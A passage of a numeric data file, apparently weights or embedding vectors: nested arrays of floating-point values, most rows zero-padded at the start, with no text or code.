0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02924, -0.06464, -0.01947, -0.02733, -0.1237, 0.0272, -0.3113, 0.3875, -0.02663, 0.1265, -0.0367, 0.0089, -0.0921, 0.2937, -0.03845, -0.6924, 0.0425, 0.06714, -0.0215, 0.2588, -0.3123, -0.0484, 0.1923, -0.0966, -1.115, -0.0901, -0.1367, 0.0298, 0.1086, 0.0214, 0.01816, -0.05615, -0.0127, -0.283, -0.09106, -0.2445, 0.3374, -0.2866, 0.01825, -0.04993, 0.05582, 0.02132, 0.1989, -0.03394, 0.0468, -0.02068, 0.05426, 0.03412, -0.0972, -0.1935], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.04193, 0.04697, -0.2593, 0.1534, -0.813, 0.1357, 0.1664, -0.3604, 0.1315, -0.259, -0.07086, 0.1475, -0.1802, -0.08295, 0.0682, 0.2064, -0.04852, -0.04666, -0.522, 0.2074, -0.3384, -0.0305, -0.1658, -0.085, -0.0542, 0.1462, 0.04712, -0.02094, 0.06525, 0.2625, 0.07825, 0.10364, -0.04855, 0.0826, -0.9946, -1.012, -2.541, -0.05692, 0.07367, -0.1405, -0.1409, 0.0676, 0.4104, -0.1611, -1.443, 0.04193, 0.118, 0.04492, -0.12256, -0.383], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0692, -0.0594, -0.02664, -0.03806, -0.3794, -0.0513, -0.8477, 0.2642, 0.01523, -0.1943, -0.001689, -0.1025, 0.0698, 0.10754, 0.1663, 0.1045, -0.1098, -0.0569, -0.02197, 0.04733, -0.0874, 0.075, 0.3809, -0.735, -3.537, 0.05588, -2.016, -0.0331, 0.04807, -0.2334, 0.01843, -0.511, -0.0248, -2.42, -0.3137, -0.07544, 0.1271, 0.0944, 0.1908, -0.0671, 0.0566, 0.06934, -0.4705, -0.2295, 0.1965, 0.0775, -0.06995, 0.1359, -0.601, -0.1126], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6216, 0.3718, -2.426, -0.12274, -6.613, -0.6924, 0.1268, 0.641, -0.196, 0.02802, -0.3357, -0.4377, 0.4329, -0.1927, 0.004383, -2.1, -0.1202, -0.8823, 0.1298, 0.1345, 0.2744, 0.11633, 1.035, -0.1149, -4.61, -2.197, 0.0469, -0.472, -0.3223, -0.2329, -0.07654, -0.1222, -0.5444, 1.09, -0.2937, -0.8105, 1.364, 0.3362, 0.1267, -0.2258, 0.4517, -0.1722, 0.2214, 0.3535, -1.502, 0.00829, -0.3376, -0.3723, 0.1064, -0.835], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02165, -0.1907, -1.144, -0.5654, -1.216, -0.1699, 0.6943, 0.1659, -0.176, 0.0697, -0.1416, -0.4246, 0.537, -0.1355, -0.13, 1.218, -0.3508, 0.05923, -0.06238, -0.0193, -0.4202, -0.02402, -0.239, -0.05417, 0.548, 0.03378, -0.1056, -0.4763, 0.2313, -0.2054, -0.2095, -0.1459, 0.2035, 0.9956, -0.3362, 0.00425, 0.845, 0.10333, 0.0845, -0.4187, 0.1848, -0.1643, -0.1133, 0.07715, 0.0693, -0.02443, -0.224, -0.296, -0.1556, 0.4502], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1666, -0.000572, -0.10736, -0.005157, 0.03894, -0.2769, -0.5986, 0.2479, -0.11975, 0.0829, -0.2347, 0.05502, -0.02719, 0.1747, -0.3713, 0.5664, -0.1326, -0.2856, -0.933, 0.3423, 0.2478, -0.2212, 0.686, -0.3809, -1.018, 0.098, -3.555, -1.104, -0.02637, -0.4143, -0.04703, 0.07855, 0.0791, 0.5986, -0.2118, 0.3838, -0.09717, -0.1987, 0.1296, -0.2311, -1.83, -0.01582, -0.08264, -0.2063, -0.6245, -0.2238, -0.07434, -0.1545, 0.423, -0.359], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1855, -0.0783, 0.04053, -0.09735, 0.1533, -0.277, 0.01793, 0.01247, -0.1641, -0.1632, -0.01487, 0.0184, 0.1537, 0.01264, 0.08167, 0.632, -0.072, 0.11176, -0.2952, 0.1068, -0.177, -0.0833, 1.31, 0.01842, 0.6587, 0.169, 0.08716, -0.05884, -0.0951, 0.169, -0.02318, 0.001552, 0.2157, -0.09735, -0.1707, -1.259, 0.1737, -0.1927, 0.2057, -0.2634, 0.00805, -0.09753, 0.03192, 0.1367, 0.2201, 0.02016, -0.01368, 0.006325, -0.2241, -0.1738], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0285, -0.08026, -0.0191, -0.03128, 0.1511, -0.002844, -0.001318, -0.01217, -0.0441, 0.0754, -0.01833, -0.03568, 0.0512, 0.05103, -0.02354, 0.02104, -0.013245, -0.03093, -0.0924, 0.01196, 0.013435, 0.05078, 0.1398, -0.01354, 0.1588, 0.01456, 0.0385, -0.0462, 0.01738, 0.165, -0.02638, -0.04434, 0.001972, 0.303, -0.1815, -0.04184, 0.03613, 0.02884, -0.1105, -0.0672, 0.04688, 0.001576, 0.04202, -0.02197, 0.0712, 0.11896, 0.01413, 0.2162, -0.04785, 0.09186], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2974, -0.11847, 0.2129, 0.263, 0.0218, 0.1793, -0.0089, 0.2803, 0.2842, 0.4668, 0.10046, -0.1313, 0.3132, -0.3438, -0.06244, 0.0719, 0.05557, 0.4033, -0.01598, -0.551, -0.544, -0.1676, -0.015366, -0.271, 0.002476, -0.3796, -0.3843, 0.2051, -0.2476, 0.4258, -0.1812, 0.3608, -0.4377, -0.311, -0.11426, 0.1377, 0.0675, 0.8726, -0.8237, -0.3513, -0.141, 0.334, -0.7876, 0.2146, -0.2642, -0.2017, 0.126, -0.4822, -0.6675, -0.5273], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0741, -0.07294, 0.02438, 0.0169, 0.1354, -0.1271, 0.04672, 0.1373, -0.02623, 0.1351, -0.01274, 0.05722, 0.1759, -0.04858, -0.00966, 0.6753, -0.00141, 0.0632, -0.3748, 0.0958, 0.1085, -0.03323, 0.5273, -0.1694, 0.245, -0.014496, -0.0655, -0.02611, -0.02997, 0.2773, -0.01604, 0.03525, 0.0993, 0.0684, -0.06433, -0.3162, -0.05215, -0.06995, -0.1445, -0.05908, 0.04037, -0.0161, -0.0587, -0.02716, 0.0432, 0.1228, -0.03195, 0.1799, -0.2264, -0.02826], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.257, -0.10706, 0.008026, -0.05475, 0.1564, -0.03168, 0.3853, 0.0702, -0.1548, 0.1775, 0.00978, 0.01866, 0.1946, 0.0855, -0.1061, 0.2155, -0.05942, 0.0508, -0.10205, 0.009796, 0.08984, -0.1077, 0.2007, -0.1665, -0.114, -0.11273, -0.06192, 0.04575, -0.1696, -0.0963, -0.0727, 0.01935, 0.128, 0.2341, 0.0685, 0.003925, 0.1512, -0.078, 0.03168, -0.001691, -0.6484, -0.08374, -0.01449, 0.000799, 0.04514, -0.0661, 0.02194, 0.0372, 0.03494, 0.231], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.716, -0.1665, -0.2126, -0.134, 0.2776, -2.818, -0.799, 0.2162, -0.2642, -0.1533, 0.072, 0.1688, 0.381, 0.616, -0.3672, 0.5776, -0.0956, -0.2194, 0.6743, -0.3022, 0.3848, 0.2825, -0.3218, -0.1404, -0.393, -0.3005, 0.898, -0.1506, 0.1362, -0.04684, -0.11066, 0.1602, -0.2554, -0.3064, -0.2925, -1.805, 0.2067, 0.3315, -0.127, -0.1296, 0.1877, 0.1603, 0.1373, 0.1142, -0.1353, -0.02565, -0.06165, 0.12384, -0.2542, -0.1964], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.9795, -0.12366, 0.2612, -2.977, 0.3777, -0.3418, 0.05872, 0.577, -0.05722, 0.01706, -0.05267, -0.007725, 0.8047, -0.583, -0.2341, 0.8765, 0.01251, -0.7188, 0.007774, 0.1295, 0.7896, -0.2095, -0.9644, 0.2001, -0.8755, -0.4429, -0.04895, 0.546, -0.5264, 0.9546, 0.0359, 0.010345, 0.5054, 0.752, 0.504, 0.08325, 1.853, 0.02042, 0.7217, 0.2367, -0.134, -0.383, 0.6484, 0.4763, -0.2054, -0.3154, -0.2018, -0.8325, 0.2285, 0.1981], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0211, -0.166, -0.00547, -0.1077, 0.2952, 0.01703, -0.08716, 0.1506, -0.11755, 0.0802, -0.02928, -0.09735, -0.1803, 0.1298, 0.081, -0.0983, -0.0864, 0.2101, -0.1273, 0.01068, 0.00659, 0.07495, 0.4321, -0.1436, 0.9746, 0.0917, 0.01761, -0.09735, -0.0364, -0.0709, -0.05646, -0.08844, 0.10785, 0.5137, -0.3567, -0.09143, 0.006203, -0.0723, -0.1637, -0.1268, 0.0731, -0.03732, 0.1622, -0.1796, 0.1153, 0.1973, -0.0972, 0.2397, -0.47, 0.2186], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3645, -0.132, 0.0804, -0.09454, -0.776, -0.691, -0.04773, 0.2837, -0.4602, 0.0887, -0.04724, -0.0978, -0.503, 0.3315, 0.0804, -0.5527, 0.0254, 0.654, -0.0731, 0.2573, 0.3027, -0.08246, -0.2498, -0.2269, -1.021, -0.1608, 0.3413, 0.0646, -1.176, 0.1223, -0.11316, -0.0796, -0.3618, 0.2255, -0.04962, -0.04813, -0.03052, 0.2373, -0.2905, 0.01231, 0.0651, 0.1804, -0.362, -0.1892, -0.1473, -0.013954, -0.2646, 0.1534, -0.06934, 0.1012], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3965, 0.01324, -0.1672, -0.0365, 0.1433, -1.376, 0.0661, 0.0676, -0.2844, 0.10767, -0.09796, -0.03812, 0.261, -0.0851, 0.06793, 0.3394, -0.2085, 0.005447, -0.01329, 0.1173, 0.1155, -0.02196, 1.088, -0.2115, 0.457, 0.02132, 0.297, -0.2869, 0.1052, -0.264, -0.02362, -0.006573, -0.02121, -0.4846, 0.1581, -0.01451, 0.3335, 0.1896, 0.08105, -0.1254, -0.1425, 0.0134, -0.2278, 0.0819, 0.07074, -0.02495, -0.05075, -0.03537, -0.53, 0.1139], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.04355, -0.01338, -0.03087, -0.01492, 0.1332, -0.2301, 0.02432, 0.2954, -0.06305, 0.0525, -0.0313, -0.01636, 0.1093, 0.015366, -0.3914, 0.31, 0.01573, -0.26, -0.3816, 0.1389, 0.079, -0.1117, 0.507, -0.106, 0.37, -0.3357, -0.1858, -0.2152, -0.0703, 0.509, 0.004612, -0.05283, 0.1057, 0.023, -0.1152, 0.0374, 0.3013, 0.0934, -0.309, -0.198, -0.2878, -0.1525, 0.03152, 0.10156, 0.117, -0.03069, -0.03644, 0.104, 0.2413, -0.04654], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.03284, -0.03128, -0.006504, 0.03754, 0.0145, 0.0341, -0.02911, -0.0088, -0.01244, -0.01253, -0.006042, -0.0431, 0.0446, -0.03394, -0.03735, -0.0314, -0.0338, 0.004395, -0.02596, -0.01782, -0.02109, -0.02737, -0.0333, 0.00974, 0.04626, 0.02473, -0.03455, -0.05618, -0.01081, -0.02747, -0.02187, 0.02113, -0.02231, -0.05228, -0.0002987, -0.005833, -0.0255, -0.03885, -0.015114, -0.0767, 0.01013, -0.005066, 0.01956, -0.013885, 0.02126, -0.004192, -0.06995, 0.005566, 0.03906, -0.02011], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.883, 0.31, 0.0772, -0.132, 0.1512, 0.818, 0.866, 0.6094, -0.11224, 0.4426, 0.0426, -0.2448, -0.03653, 0.01417, 0.535, 0.4377, -1.442, -1.414, -2.729, -0.1624, -0.7827, -0.5723, 0.0479, -0.2505, 0.562, 0.4001, 0.3054, -0.828, -0.01807, 0.28, -0.9272, -0.2573, 0.1829, 0.567, 0.7744, 0.3489, 1.202, 0.886, 0.022, -0.2622, -0.2905, 0.4463, -0.3235, 0.05222, 0.2656, -0.2466, 0.3416, 0.05286, 0.789, -0.1025], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1093, -0.157, -0.007187, -0.05124, 0.3013, -0.0865, 0.12134, 0.0922, -0.09045, -0.3123, -0.00102, -0.00226, -0.127, 0.1425, 0.1487, -0.2434, -0.03275, 0.1595, 0.005753, 0.11993, -0.04544, -0.0655, 0.4297, 0.0622, 2.045, -0.1472, 0.1526, 0.05057, 0.01744, 0.06323, -0.089, 0.03647, -0.2324, 0.098, -0.1245, -0.01437, 0.3215, 0.1183, -0.03024, -0.00541, -0.00901, 0.04245, -0.0964, -0.09357, 0.2017, -0.0432, -0.131, 0.09894, 0.2449, -0.011314], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06836, 0.01068, 0.003902, 0.144, -4.18, 0.1481, 0.4985, -0.3005, -0.06506, 0.1251, 0.01863, -0.06866, -0.7104, -0.2092, 0.01465, 0.2003, -0.0246, -2.674, -0.00197, 0.2285, 0.00863, -0.0715, 0.726, -0.0369, -0.1483, -0.03693, -0.1726, -0.01674, -0.001829, 0.61, -0.01461, -0.0003722, 0.02638, -0.0435, -0.3118, -0.01334, 0.671, 0.2462, 0.4238, -0.0913, -0.05203, -0.10205, -0.388, 0.0268, -0.1857, -0.04028, 0.03503, -0.19, 0.0773, 0.005733], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4143, -0.031, 0.3164, 0.2031, -1.811, -0.2032, 0.391, -0.6875, -0.2335, -0.0612, 0.0357, -0.6914, -2.441, 0.0687, 0.03107, 0.2186, -0.1604, 0.2305, -0.7075, -0.63, 0.0006275, 0.3801, 3.123, 0.3384, 0.0994, 0.661, -1.21, 0.02837, -0.05347, 1.106, 0.08264, -0.2517, 0.318, 0.0587, 0.059, 0.061, 0.673, -0.04593, 0.1747, -0.1125, -0.3499, 0.137, -0.4658, -1.82, -0.585, -0.1555, -0.132, 0.1976, 0.08563, -0.1658], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1052, -0.00975, 0.001682, 0.01971, -0.4038, -0.2485, 0.4077, 0.0332, -0.1665, 0.0851, -0.2198, -0.4258, 0.07556, 0.3665, -0.1681, 0.1757, -0.1516, 0.05807, -0.209, -0.3882, -0.0508, -0.01591, 0.5244, -0.0796, 0.297, -0.0927, -0.0709, -0.0728, 0.1442, 0.2266, -0.04105, 0.14, -0.0443, 0.4421, 0.02585, 0.098, -0.0806, 0.1431, -0.09265, -0.00334, 0.2092, 0.00749, 0.0824, 0.1718, -0.233, 0.08234, 0.0857, 0.2915, 0.09467, -0.1558], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.8423, -0.67, 0.2505, -0.04272, -0.1748, -2.14, -0.59, 1.055, 0.5947, -0.6006, 0.2917, 0.01443, -1.766, -0.2085, -0.3013, -1.679, -0.9575, 1.17, -0.903, -0.8555, 0.922, -0.6772, 0.4739, -0.4087, -1.858, 0.2717, -1.245, 0.567, 0.3945, -1.168, 0.0353, 0.25, -0.6914, 0.229, -0.246, 0.1433, -2.994, 1.096, 0.57, 0.05676, 0.09424, 0.2803, -0.259, 0.728, 0.225, -0.1953, -5.57, 0.0689, 1.073, -1.581], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.027, 0.4558, -0.5444, -1.033, 0.752, -0.495, 0.02956, 0.2104, 0.0982, -0.5103, -0.1725, 0.2097, -2.56, -0.666, -1.284, -0.2496, -0.007557, 0.3994, -0.3757, 0.04477, 0.3884, -0.1005, 0.10236, 0.002953, -0.5493, -0.752, -0.373, -0.5596, -0.3188, 0.411, -0.1304, 0.08405, 0.04272, -0.5845, -0.0704, -0.02223, -4.08, 0.5435, -0.1377, -0.0977, 0.0546, -0.69, -0.688, -0.2783, 1.373, -0.4055, -0.6846, -0.7017, 0.2152, -5.74], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1324, 0.00654, -0.1819, -0.1835, -0.007343, 0.0619, -0.0766, 0.00871, -0.2347, -0.1487, -0.1451, 0.03123, 0.1566, -0.1395, -0.224, -1.787, -0.008545, 0.1399, -0.02167, 0.2091, -0.8413, 0.2198, 0.6353, -0.3333, -0.8716, -0.1318, 0.476, -0.0629, -0.1493, 0.2654, 0.06866, -0.1454, -0.3398, 0.711, -0.0699, 0.0957, -0.705, -0.0314, 0.3762, -0.63, -0.697, 0.2378, -0.1492, -0.4048, 0.03345, 0.1593, -0.2969, -0.04074, -0.1821, 0.04947], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2878, -0.04678, -0.1312, -0.126, 0.352, -1.78, 0.1328, 0.07574, -0.01205, 0.1649, -0.09625, 0.12024, -0.2996, -0.1678, 0.348, 0.4746, -0.11005, 0.103, -0.1847, 0.2046, -0.4634, 0.05316, 1.322, -0.5527, 0.2249, 0.05713, 0.565, -0.311, -0.01859, 0.2029, -0.11707, 0.04736, -0.4048, 0.08246, -0.2095, -0.0879, 0.1432, 0.1238, -0.4346, -0.1487, 0.01452, -0.0946, -0.1515, -0.1661, -0.1255, 0.10754, -0.2795, 0.01128, 0.7266, -0.2242], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1423, -0.814, -0.4043, -0.37, -0.4521, -0.9014, 0.88, 0.784, -0.207, 0.3928, 0.04895, -0.1671, -3.959, 0.8975, -0.4421, 0.894, -0.4824, -0.003756, 0.3464, -0.0681, 1.045, 0.4707, 2.484, 0.0976, -1.011, -0.28, -2.115, -0.214, -0.4275, 0.1058, -0.7705, -0.506, -0.02774, 1.219, -0.2966, 0.1089, 1.753, -1.194, 1.025, -0.4094, -1.017, -0.3862, -0.2211, -0.4783, 0.002945, -0.6226, 0.1787, -1.928, 0.368, 0.602], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 